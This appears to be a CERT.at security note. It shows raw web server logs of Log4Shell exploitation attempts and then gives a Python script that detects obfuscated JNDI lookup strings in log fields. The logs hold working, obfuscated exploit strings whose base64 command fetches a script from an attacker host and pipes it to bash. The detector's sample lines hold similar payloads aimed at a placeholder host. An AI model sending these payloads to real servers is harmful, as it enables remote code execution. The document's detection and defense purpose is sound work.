195.54.160.149 - - [28/Dec/2021:14:14:19 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [28/Dec/2021:14:14:19 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [29/Dec/2021:01:23:22 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
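
Several of the requests above hide the string `jndi:ldap` behind nested lookups such as `${lower:l}` and `${::-j}`, so a plain text search for `${jndi:` misses them. The following detection sketch is an added example, not part of the original CERT.at report: it resolves those lookups and percent-encoding in the request, referer and user-agent fields before matching. The log lines, the host `callback.example` and all function names are constructed for illustration, and a `${name:-default}` lookup is assumed to fall back to its default.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: client, time, request, status, size, referer, user agent.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" \d{3} \S+ "(.*?)" "(.*?)"$')
# Innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:(\w+)://([^/}\s]+)", re.IGNORECASE)
OPEN, CLOSE = "\x01", "\x02"  # stand-ins for "${" and "}" of lookups that are kept


def _resolve(match):
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    kind = prefix.lower()
    if sep and kind == "lower":
        return rest.lower()
    if sep and kind == "upper":
        return rest.upper()
    if kind != "jndi" and ":-" in body:
        # Assumption: the name before ":-" is unset, so "${::-j}" becomes "j".
        return body.split(":-", 1)[1]
    return OPEN + body + CLOSE  # keep the lookup, but hide it from the next pass


def normalize(value):
    """Undo percent-encoding and nested lookup obfuscation in one log field."""
    text = unquote(value)
    while True:
        text, changed = INNER.subn(_resolve, text)
        if not changed:
            break
    return text.replace(OPEN, "${").replace(CLOSE, "}")


def scan(lines):
    """Return (client, field, protocol, callback host) for every JNDI lookup found."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, request, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        for field, value in fields:
            found = JNDI.search(normalize(value))
            if found:
                hits.append((client, field, found.group(1).lower(), found.group(2)))
    return hits


# Constructed sample lines (documentation address ranges, placeholder callback host).
SAMPLE = [
    '192.0.2.10 - - [21/Dec/2021:14:07:13 +0100] "GET /${jndi:ldap://callback.example:1389/a} HTTP/1.1" 301 604 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Dec/2021:04:36:48 +0100] "GET / HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://callback.example:1389/a}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://callback.example:1389/a}"',
    '198.51.100.7 - - [22/Dec/2021:04:36:49 +0100] "GET /?s=%24%7Bjndi:dns://callback.example/x%7D HTTP/1.1" 200 10004 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Dec/2021:05:00:00 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

A hit only shows that a lookup string reached the web server; whether it was evaluated depends on the Log4j version behind it, so the extracted callback hosts are best correlated with outbound connection logs.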

Disclaimer

The scripts and solutions listed here have been carefully reviewed by CERT.at. Nevertheless, sole responsibility for the use of the information provided here lies with the user. Any liability on the part of CERT.at is explicitly excluded.